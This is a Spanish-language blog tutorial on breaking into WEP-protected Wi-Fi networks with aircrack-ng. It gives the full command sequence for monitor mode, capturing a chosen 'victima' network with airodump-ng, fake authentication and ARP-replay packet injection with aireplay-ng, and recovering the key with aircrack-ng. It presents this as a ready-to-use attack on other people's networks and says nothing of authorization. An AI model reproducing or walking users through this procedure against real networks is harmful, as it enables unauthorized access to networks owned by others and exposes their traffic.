Buscador

BUSCAR

Followers

Blog Archive

Hackear redes WIFI con clave WEP


Requisitos:
1.Portatil con linux que te detecte la tarjeta de red.  Se pueden usar los liveCD como BackTrack y WifixLax siempre que te detecte la tarjeta de red inalambrica.
2.Tener instalado el aircrack-ng
Descargas:
Datos a conocer:
MAC de tu tarjeta de red inalambrica.  La puedes averiguar escribiendo en la terminal “ifconfig”… aparecera una lista con todos tus dispositivos de red. Busca una que se llame “wlan0, ath0″ o similiar, en esa parte apareceran una serie de numeros del tipo “00:16:33:6g:f5:g7″. Ese será el codigo MAC
Identificar tu tarjeta de red inalambrica. A la hora de averiguar la MAC habreis encontrado el nombre de“wlan0,ath0″ o similar, el nombre que aparezca será el nombre de tu tarjeta de red.
———————————————————————————————————————–
Antes de empezar y una vez obtenido los datos tenemos que poner la tarjeta de red en modo monitor... abrir una terminal.
sudo airmon-ng start {nombre de la tarjeta de red}
->Ahora la tarjeta de red se llama mon0 y actuara en modo monitor.
————————————————————————————————–
Empezaremos abriendo 3 terminales.

Terminal1: usaremos para recibir todos los paquetes e identificar a la victima [airodump-ng]

1. Identificar a la victima.
sudo airodump-ng mon0
Aparecera algo como esto:
Una vez optenido unos cuantos nombres… pulsar CTRL+C para pararlo.
Los datos que tenemos que coger de la victima son: El “ESSID” y “BSSID” y asegurarnos de que la “ENC” esta en “WEP” y el “PWR” no es muy bajo. Tambien tienes que fijarte en el “CH” para la hora de capturar paquetes.
Una vez sabido eso escribimos en la terminal:
sudo airodump-ng -w {cualquiernombre} –channel {escribe la “CH”} mon0
-> Empezara otra vez ha hacer lo mismo.

Terminal2: usaremos para inyectar paquetes [aireplay-ng]

sudo aireplay-ng -1 0 -a {“BSSID” de la victima} -e {“ESSID” de la victima} -h {Tu “MAC”} mon0
-> Despues de poner esto, deberia aparecer algo que diga que lo ha echo bien.
sudo aireplay-ng -3 -b {“BSSID” de la victima} -e {“ESSID” de la victima} -h {Tu “MAC”} mon0
-> Ahora es cuando comienza el ataque, puede tardar un tiempo. Al principio veras que parece que no hace nada, pero con el tiempo empezara a inyectar paquetes.

Terminal3: usaremos para conseguir la clave. [aircrack-ng]

Antes de usar el aircrack, hay que fijarse en la cantidad de paquetes capturados, lo puedes saber fijandote en la 1º terminal cuando veas que la victima ha llegado a 5000 paquetes en la zona “#Data”. Una vez esto escribes
sudo aircrack-ng {nombre_que_has_puesto_despues_de_la_w_en_la_1º_terminal}
->Te aparecera una lista con todas las victimas que ha encontrado. Solo tienes que seleccionar tu victima y esperar.

1 comentarios:

Salva dijo...

Cualquier duda que tengais será respondida!

Publicar un comentario